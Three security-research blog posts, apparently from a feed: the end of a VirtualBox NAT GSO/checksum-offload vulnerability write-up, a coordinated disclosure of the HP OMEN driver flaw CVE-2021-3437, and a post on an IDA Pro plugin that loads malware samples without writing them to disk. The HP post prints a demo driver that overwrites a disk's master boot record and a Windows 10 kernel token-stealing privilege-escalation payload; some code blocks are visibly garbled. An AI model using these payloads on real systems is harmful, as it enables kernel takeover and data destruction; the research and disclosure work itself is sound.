   /** The max segment size (MSS) to apply. */
   uint16_t            cbMaxSeg;
 
   /** Offset of the first header (IPv4 / IPv6).  0 if not not needed. */
   uint8_t             offHdr1;
   /** Offset of the second header (TCP / UDP).  0 if not not needed. */
   uint8_t             offHdr2;
   /** The header size used for segmentation (equal to offHdr2 in UFO). */
   uint8_t             cbHdrsSeg;
   /** Unused. */
   uint8_t             u8Unused;
} PDMNETWORKGSO;

Once this has been constructed, the VirtIO code creates a scatter-gatherer to assemble the frame from the various descriptors:

          /* Assemble a complete frame. */
               for (unsigned int i = 1; i  0; i++)
               {
                   unsigned int cbSegment = RT_MIN(uSize, elem.aSegsOut[i].cb);
                   PDMDevHlpPhysRead(pDevIns, elem.aSegsOut[i].addr,
                    
                                     ((uint8_t*)pSgBuf->aSegs[0].pvSeg) + uOffset,
                                     cbSegment);
                   uOffset += cbSegment;
                   uSize -= cbSegment;
               }

The frame is passed to the NAT code along with the new GSO structure, reaching the point that drew my interest originally.

Vulnerability Analysis

CVE-2021-2145 – Oracle VirtualBox NAT Integer Underflow Privilege Escalation Vulnerability

When the NAT code receives the GSO frame, it gets the full ethernet packet and passes it to Slirp (a library for TCP/IP emulation) as an mbuf message. In order to do this, VirtualBox allocates a new mbuf message and copies the packet to it. The allocation function takes a size and picks the next largest allocation size from three distinct buckets:

  1. MCLBYTES (0x800 bytes)
  2. MJUM9BYTES (0x2400 bytes)
  3. MJUM16BYTES (0x4000 bytes)
struct mbuf *slirp_ext_m_get(PNATState pData, size_t cbMin, void **ppvBuf, size_t *pcbBuf)
{
   struct mbuf *m;
   int size = MCLBYTES;
   LogFlowFunc(("ENTER: cbMin:%d, ppvBuf:%p, pcbBuf:%p\n", cbMin, ppvBuf, pcbBuf));
 
   if (cbMin 

If the supplied size is larger than MJUM16BYTES, an assertion is triggered. Unfortunately, this assertion is only compiled when the RT_STRICT macro is used, which is not the case in release builds. This means that execution will continue after this assertion is hit, resulting in a bucket size of 0x800 being selected for the allocation. Since the actual data size is larger, this results in a heap overflow when the user data is copied into the mbuf.

/** @def AssertMsgFailed
* An assertion failed print a message and a hit breakpoint.
*
* @param   a   printf argument list (in parenthesis).
*/
#ifdef RT_STRICT
# define AssertMsgFailed(a)  \
   do { \
       RTAssertMsg1Weak((const char *)0, __LINE__, __FILE__, RT_GCC_EXTENSION __PRETTY_FUNCTION__); \
       RTAssertMsg2Weak a; \
       RTAssertPanic(); \
   } while (0)
#else
# define AssertMsgFailed(a)     do { } while (0)
#endif

CVE-2021-2310 - Oracle VirtualBox NAT Heap-based Buffer Overflow Privilege Escalation Vulnerability

Throughout the code, a function called PDMNetGsoIsValid is used which verifies whether the GSO parameters supplied by the guest are valid. However, whenever it is used it is placed in an assertion. For example:

DECLINLINE(uint32_t) PDMNetGsoCalcSegmentCount(PCPDMNETWORKGSO pGso, size_t cbFrame)
{
   size_t cbPayload;
   Assert(PDMNetGsoIsValid(pGso, sizeof(*pGso), cbFrame));
   cbPayload = cbFrame - pGso->cbHdrsSeg;
   return (uint32_t)((cbPayload + pGso->cbMaxSeg - 1) / pGso->cbMaxSeg);
}

As mentioned before, assertions like these are not compiled in the release build. This results in invalid GSO parameters being allowed; a miscalculation can be caused for the size given to slirp_ext_m_get, making it less than the total copied amount by the memcpy in the for-loop. In my proof-of-concept, my parameters for the calculation of pGso->cbHdrsTotal + pGso->cbMaxSeg used for cbMin resulted in an allocation of 0x4000 bytes, but the calculation for cbPayload resulted in a memcpy call for 0x4065 bytes, overflowing the allocated region.

CVE-2021-2442 - Oracle VirtualBox NAT UDP Header Out-of-Bounds

The title of this post makes it seem like GSO is the only vulnerable offload mechanism in place here; however, another offload mechanism is vulnerable too: Checksum Offload.

Checksum offloading can be applied to various protocols that have checksums in their message headers. When emulating, VirtualBox supports this for both TCP and UDP.

In order to access this feature, the GSO frame needs to have the first bit of the u8Flags member set to indicate that the checksum offload is required. In the case of VirtualBox, this bit must always be set since it cannot handle GSO without performing the checksum offload. When VirtualBox handles UDP packets with GSO, it can end up in the function PDMNetGsoCarveSegmentQD in certain circumstances:

       case PDMNETWORKGSOTYPE_IPV4_UDP:
           if (iSeg == 0)
               pdmNetGsoUpdateUdpHdrUfo(RTNetIPv4PseudoChecksum((PRTNETIPV4)&pbFrame[pGso->offHdr1]),
                                        pbSegHdrs, pbFrame, pGso->offHdr2);

The function pdmNetGsoUpdateUdpHdrUfo uses the offHdr2 to indicate where the UDP header is in the packet structure. Eventually this leads to a function called RTNetUDPChecksum:

RTDECL(uint16_t) RTNetUDPChecksum(uint32_t u32Sum, PCRTNETUDP pUdpHdr)
{
   bool fOdd;
   u32Sum = rtNetIPv4AddUDPChecksum(pUdpHdr, u32Sum);
   fOdd = false;
   u32Sum = rtNetIPv4AddDataChecksum(pUdpHdr + 1, RT_BE2H_U16(pUdpHdr->uh_ulen) - sizeof(*pUdpHdr), u32Sum, &fOdd);
   return rtNetIPv4FinalizeChecksum(u32Sum);
}

This is where the vulnerability is. In this function, the uh_ulen property is completely trusted without any validation, which results in either a size that is outside of the bounds of the buffer, or an integer underflow from the subtraction of sizeof(*pUdpHdr).

rtNetIPv4AddDataChecksum receives both the size value and the packet header pointer and proceeds to calculate the checksum:

   /* iterate the data. */
   while (cbData > 1)
   {
       u32Sum += *pw;
       pw++;
       cbData -= 2;
   }

From an exploitation perspective, adding large amounts of out of bounds data together may not seem particularly interesting. However, if the attacker is able to re-allocate the same heap location for consecutive UDP packets with the UDP size parameter being added two bytes at a time, it is possible to calculate the difference in each checksum and disclose the out of bounds data.

On top of this, it’s also possible to use this vulnerability to cause a denial-of-service against other VMs in the network:

Got another Virtualbox vuln fixed (CVE-2021-2442)

Works as both an OOB read in the host process, as well as an integer underflow. In some instances, it can also be used to remotely DoS other Virtualbox VMs! pic.twitter.com/Ir9YQgdZQ7

— maxpl0it (@maxpl0it) August 1, 2021

Outro

Offload support is commonplace in modern network devices so it’s only natural that virtualization software emulating devices does it as well. While most public research has been focused on their main components, such as ring buffers, offloads don’t appear to have had as much scrutiny. Unfortunately in this case I didn’t manage to get an exploit together in time for the Pwn2Own contest, so I ended up reporting the first two to the Zero Day Initiative and the checksum bug to Oracle directly.

CVE-2021-3437 | HP OMEN Gaming Hub Privilege Escalation Bug Hits Millions of Gaming Devices

14 September 2021 at 11:00

Executive Summary

  • SentinelLabs has discovered a high severity flaw in an HP OMEN driver affecting millions of devices worldwide.
  • Attackers could exploit these vulnerabilities to locally escalate to kernel-mode privileges. With this level of access, attackers can disable security products, overwrite system components, corrupt the OS, or perform any malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to HP on Feb 17, 2021 and the vulnerability is tracked as CVE-2021-3437, marked with CVSS Score 7.8.
  • HP has released a security update to its customers to address these vulnerabilities.
  • At this time, SentinelOne has not discovered evidence of in-the-wild abuse.

Introduction

HP OMEN Gaming Hub, previously known as HP OMEN Command Center, is a software product that comes preinstalled on HP OMEN desktops and laptops. This software can be used to control and optimize settings such as device GPU, fan speeds, CPU overclocking, memory and more. The same software is used to set and adjust lighting and other controls on gaming devices and accessories such as mouse and keyboard.

Following on from our previous research into other HP products, we discovered that this software utilizes a driver that contains vulnerabilities that could allow malicious actors to achieve a privilege escalation to kernel mode without needing administrator privileges.

CVE-2021-3437 essentially derives from the HP OMEN Gaming Hub software using vulnerable code partially copied from an open source driver. In this research paper, we present details explaining how the vulnerability occurs and how it can be mitigated. We suggest best practices for developers that would help reduce the attack surface provided by device drivers with exposed IOCTLs handlers to low-privileged users.

Technical Details

Under the hood of HP OMEN Gaming Hub lies the HpPortIox64.sys driver, C:\Windows\System32\drivers\HpPortIox64.sys. This driver is developed by HP as part of OMEN, but it is actually a partial copy of another problematic driver, WinRing0.sys, developed by OpenLibSys.

The link between the two drivers can readily be seen as on some signed HP versions the metadata information shows the original filename and product name:

File Version information from CFF Explorer

Unfortunately, issues with the WinRing0.sys driver are well-known. This driver enables user-mode applications to perform various privileged kernel-mode operations via IOCTLs interface.

The operations provided by the HpPortIox64.sys driver include read/write kernel memory, read/write PCI configurations, read/write IO ports, and MSRs. Developers may find it convenient to expose a generic interface of privileged operations to user mode for stability reasons by keeping as much code as possible from the kernel-module.

The IOCTL codes 0x9C4060CC, 0x9C4060D0, 0x9C4060D4, 0x9C40A0D8, 0x9C40A0DC and 0x9C40A0E0 allow user mode applications with low privileges to read/write 1/2/4 bytes to or from an IO port. This could be leveraged in several ways to ultimately run code with elevated privileges in a manner we have previously described here.

The following image highlights the vulnerable code that allows unauthorized access to IN/OUT instructions, with IN instructions marked in red and OUT instructions marked in blue:

The Vulnerable Code – unauthorized access to IN/OUT instructions

Since I/O privilege level (IOPL) equals the current privilege level (CPL), it is possible to interact with peripheral devices such as internal storage and GPU to either read/write directly to the disk or to invoke Direct Memory Access (DMA) operations. For example, we could communicate with ATA port IO for directly writing to the disk, then overwrite a binary that is loaded by a privileged process.

For the purposes of illustration, we wrote this sample driver to demonstrate the attack without pursuing an actual exploit:

unsigned char port_byte_in(unsigned short port) {
	return __inbyte(port);
}

void port_byte_out(unsigned short port, unsigned char data) {
	__outbyte(port, data);
}

void port_long_out(unsigned short port, unsigned long data) {
	__outdword(port, data);
}

unsigned short port_word_in(unsigned short port) {
	return __inword(port);
}

#define BASE 0x1F0

void read_sectors_ATA_PIO(unsigned long LBA, unsigned char sector_count) {
	ATA_wait_BSY();
	port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x20); //Send the read command


	for (int j = 0; j < sector_count; j++) {
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { USHORT a = port_word_in(BASE); DbgPrint("0x%x, ", a); } } } void write_sectors_ATA_PIO(unsigned char LBA, unsigned char sector_count) { ATA_wait_BSY(); port_byte_out(BASE + 6, 0xE0 | ((LBA >> 24) & 0xF));
	port_byte_out(BASE + 2, sector_count);
	port_byte_out(BASE + 3, (unsigned char)LBA);
	port_byte_out(BASE + 4, (unsigned char)(LBA >> 8));
	port_byte_out(BASE + 5, (unsigned char)(LBA >> 16));
	port_byte_out(BASE + 7, 0x30);

	for (int j = 0; j < sector_count; j++)
	{
		ATA_wait_BSY();
		ATA_wait_DRQ();
		for (int i = 0; i < 256; i++) { port_long_out(BASE, 0xffffffff); } } } static void ATA_wait_BSY() //Wait for bsy to be 0 { while (port_byte_in(BASE + 7) & STATUS_BSY); } static void ATA_wait_DRQ() //Wait fot drq to be 1 { while (!(port_byte_in(BASE + 7) & STATUS_RDY)); } NTSTATUS DriverEntry(PDRIVER_OBJECT driver_object, PUNICODE_STRING registry) { UNREFERENCED_PARAMETER(registry); driver_object->DriverUnload = drv_unload;

	DbgPrint("Before: \n");
	read_sectors_ATA_PIO(0, 1);
	write_sectors_ATA_PIO(0, 1);
	
	DbgPrint("\nAfter: \n");
	read_sectors_ATA_PIO(0, 1);

	return STATUS_SUCCESS;
}

This ATA PIO read/write is based on LearnOS. Running this driver will result in the following DebugView prints:

Debug logging from the driver in DbgView utility

Trying to restart this machine will result in an ‘Operating System not found’ error message because our demo driver destroyed the first sector of the disk (the MBR).

The machine fails to boot due to corrupted MBR

It’s worth mentioning that the impact of this vulnerability is platform dependent. It can potentially be used to attack device firmware or perform legacy PCI access by accessing ports 0xCF8/0xCFC. Some laptops may have embedded controllers which are reachable via IO port access.

Another interesting vulnerability in this driver is an arbitrary MSR read/write, accessible via IOCTLs 0x9C402084 and 0x9C402088. Model-Specific Registers (MSRs) are registers for querying or modifying CPU data. RDMSR and WRMSR are used to read and write to MSR accordingly. Documentation for WRMSR and RDMSR can be found on Intel(R) 64 and IA-32 Architecture Software Developer’s Manual Volume 2 Chapter 5.

In the following image, arbitrary MSR read is marked in green, MSR write in blue, and HLT is marked in red (accessible via IOCTL 0x9C402090, which allows executing the instruction in a privileged context).

Vulnerable code with unauthorized access to MSR registers

Most modern systems only use MSR_LSTAR during a system call transition from user-mode to kernel-mode:

MSR_LSTAR MSR register in WinDbg

It should be noted that on 64-bit KPTI enabled systems, LSTAR MSR points to nt!KiSystemCall64Shadow.

The entire transition process looks something like as follows:

The entire process of transition from the User Mode to Kernel mode

These vulnerabilities may allow malicious actors to execute code in kernel mode very easily, since the transition to kernel-mode is done via an MSR. This is basically an exposed WRMSR instruction (via IOCTL) that gives an attacker an arbitrary pointer overwrite primitive. We can overwrite the LSTAR MSR and achieve a privilege escalation to kernel mode without needing admin privileges to communicate with this device driver.

Using the DeviceTree tool from OSR, we can see that this driver accepts IOCTLs without ACLs enforcements (note: Some drivers handle access to devices independently in IRP_MJ_CREATE routines):

Using DeviceTree software to examine the security descriptor of the device
The function that handles IOCTLs to write to arbitrary MSRs

Weaponizing this kind of vulnerability is trivial as there’s no need to reinvent anything; we just took the msrexec project and armed it with our code to elevate our privileges.

Our payload to elevate privileges:

	//extern "C" void elevate_privileges(UINT64 pid);
	//DWORD current_process_id = GetCurrentProcessId();
	vdm::msrexec_ctx msrexec(_write_msr);
	msrexec.exec([&](void* krnl_base, get_system_routine_t get_kroutine) -> void
	{
		const auto dbg_print = reinterpret_cast(get_kroutine(krnl_base, "DbgPrint"));
		const auto ex_alloc_pool = reinterpret_cast(get_kroutine(krnl_base, "ExAllocatePool"));

		dbg_print("> allocated pool -> 0x%p\n", ex_alloc_pool(NULL, 0x1000));
		dbg_print("> cr4 -> 0x%p\n", __readcr4());
		elevate_privileges(current_process_id);
	});

The assembly payload:

elevate_privileges proc
_start:
	push rsi
	mov rsi, rcx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]
	
__findsys:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, 4
	jnz __findsys

	mov rax, rbx
	mov rbx, gs:[188h]
	mov rbx, [rbx + 220h]

__findarg:
	mov rbx, [rbx + 448h]
	sub rbx, 448h
	mov rcx, [rbx + 440h]
	cmp rcx, rsi
	jnz __findarg

	mov rcx, [rax + 4b8h]
	and cl, 0f0h
	mov [rbx + 4b8h], rcx

	xor rax, rax
	pop rsi
	ret
elevate_privileges endp

Note that this payload is written specifically for Windows 10 20H2.

Let’s see what it looks like in action.

OMEN Gaming Hub Privilege Escalation

Initially, HP developed a fix that verifies the initiator user-mode applications that communicate with the driver. They open the nt!_FILE_OBJECT of the callee, parsing its PE and validating the digital signature, all from kernel mode. While this in itself should be considered unsafe, their implementation (which also introduced several additional vulnerabilities) did not fix the original issue. It is very easy to bypass these mitigations using various techniques such as “Process Hollowing”. Consider the following program as an example:

int main() {

    puts("Opening a handle to HpPortIO\r\n");

    hDevice = CreateFileW(L"\\\\.\\HpPortIO", FILE_ANY_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {

        printf("failed! getlasterror: %d\r\n", GetLastError());


        return -1;

    }

    printf("succeeded! handle: %x\r\n", hDevice);

    return -1;

}

Running this program against the fix without Process Hollowing will result in:

    Opening a handle to HpPortIO failed! 
    getlasterror: 87

While running this with Process Hollowing will result in:

    Opening a handle to HpPortIO succeeded! 
    handle: <HANDLE>

It’s worth mentioning that security mechanisms such as PatchGuard and security hypervisors should mitigate this exploit to a certain extent. However, PatchGuard can still be bypassed. Some of its protected structure/data are MSRs, but since PatchGuard samples these assets periodically, restoring the original values very quickly may enable you to bypass it.

Impact

An exploitable kernel driver vulnerability can lead an unprivileged user to SYSTEM, since the vulnerable driver is locally available to anyone.

This high severity flaw, if exploited, could allow any user on the computer, even without privileges, to escalate privileges and run code in kernel mode. Among the obvious abuses of such vulnerabilities are that they could be used to bypass security products.

An attacker with access to an organization’s network may also gain access to execute code on unpatched systems and use these vulnerabilities to gain local elevation of privileges. Attackers can then leverage other techniques to pivot to the broader network, like lateral movement.

Impacted products:

  • HP OMEN Gaming Hub prior to version 11.6.3.0 is affected
  • HP OMEN Gaming Hub SDK Package prior 1.0.44 is affected

Development Suggestions

To reduce the attack surface provided by device drivers with exposed IOCTLs handlers, developers should enforce strong ACLs on device objects, verify user input and not expose a generic interface to kernel mode operations.

Remediation

HP released a Security Advisory on September 14th to address this vulnerability. We recommend customers, both enterprise and consumer, review the HP Security Advisory for complete remediation details.

Conclusion

This high severity vulnerability affects millions of PCs and users worldwide. While we haven’t seen any indicators that these vulnerabilities have been exploited in the wild up till now, using any OMEN-branded PC with the vulnerable driver utilized by OMEN Gaming Hub makes the user potentially vulnerable. Therefore, we urge users of OMEN PCs to ensure they take appropriate mitigating measures without delay.

We would like to thank HP for their approach to our disclosure and for remediating the vulnerabilities quickly.

Disclosure Timeline

17, Feb, 2021 – Initial report
17, Feb, 2021 – HP requested more information
14, May, 2021 – HP sent us a fix for validation
16, May, 2021 – SentinelLabs notified HP that the fix was insufficient
07, Jun, 2021 – HP delivered another fix, this time disabling the whole feature
27, Jul, 2021 – HP released an update to the software on the Microsoft Store
14, Sep 2021 – HP released a security advisory for CVE-2021-3437
14, Sep 2021 – SentinelLabs’ research published

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the loaders in the loaders directory of IDA.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  • Place the memory loader DLL in the IDA directory folder.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. The UrlLoader will suggest a file to open.
  3. After you chose UrlLoader, you will be asked enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files: (Similar in: (X64 | x64) and( X64 | X32)
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
  • Conclusion

    When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

    Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

    Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

    The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

❌
❌